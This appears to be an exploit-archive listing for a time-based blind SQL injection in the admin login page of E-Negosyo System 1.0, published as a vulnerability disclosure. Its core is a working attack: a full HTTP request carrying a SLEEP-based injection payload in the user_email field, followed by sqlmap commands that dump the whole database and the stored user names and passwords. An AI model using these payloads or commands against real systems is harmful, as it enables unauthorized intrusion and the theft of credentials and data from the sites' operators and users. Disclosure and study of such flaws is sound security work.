E-Negosyo System 1.0 SQL Injection

E-Negosyo System 1.0 SQL Injection: Posted Sep 22, 2021; Authored by Janik Wehrli; E-Negosyo System version 1.0 suffers from a remote time-based blind SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 230aba72f8107f8555be48d76537b1f6c27a1b36b213bf98f58c7f7c6b9baf2c; Download | Favorite | View

E-Negosyo System 1.0 SQL Injection

# Exploit Title: E-Negosyo System 1.0 - Time-Based Blind SQLi - admin/login.php
# Date: 2021-09-22
# Exploit Author: Janik Wehrli
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsenordering_0.zip
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18.04, Windows 10 Home


# The Parameter user_email in the file /admin/login.php is vulnerable to a Time based blind SQL injection.
# It's possible to inject malicous SQL queries and for e.g. dump the database

# POC 1 - Request sleeps for 5 seconds
# Vulnerable Request with test payload: '+AND+(SELECT+100+FROM+(SELECT(SLEEP(5)))aaa)+AND+'abc'%3d'abc

POST /bsenordering/admin/login.php HTTP/1.1
Host: 192.168.159.170
Content-Length: 129
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.159.170
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.159.170/bsenordering/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: __news247__logged=1; __news247__key=1291977b6ceff418f2a502a0dfd9de18; PHPSESSID=j5vc7kpnsudjnkjf2v3l649lp0
Connection: close

user_email='+AND+(SELECT+100+FROM+(SELECT(SLEEP(5)))aaa)+AND+'abc'%3d'abc%26user_pass%3daaa%26btnLogin%3d&user_pass=aaa&btnLogin=



# POC 2 - Dump the Database with sqlmap
# Capture a sample request to /admin/login.php with burp and save it to a file for easier use.
sqlmap -r request --dbms mysql --level 5 --risk 3 --dump




# POC 3 - Dump the U_NAME and U_PASS field from the tbluseraccounts with sqlmap
# Capture a sample request to /admin/login.php with burp and save it to a file for easier use.

sqlmap -r request --dbms mysql --level 5 --risk 3 --dump -D dbbsenordering -T tbluseraccount --proxy=http://127.0.0.1:8080 -C U_PASS,U_NAME

Top Authors In Last 30 Days

Red Hat 285 files
Ubuntu 66 files
Debian 23 files
LiquidWorm 10 files
Valentin Lobstein 10 files
nu11secur1ty 7 files
Google Security Research 4 files
Milad Karimi 4 files
Jann Horn 3 files
Lennert Preuth 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,025)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,485)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,706)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,394)
UnixWare (187)
Windows (6,653)
Other

E-Negosyo System 1.0 SQL Injection

E-Negosyo System 1.0 SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

E-Negosyo System 1.0 SQL Injection

Share This

E-Negosyo System 1.0 SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems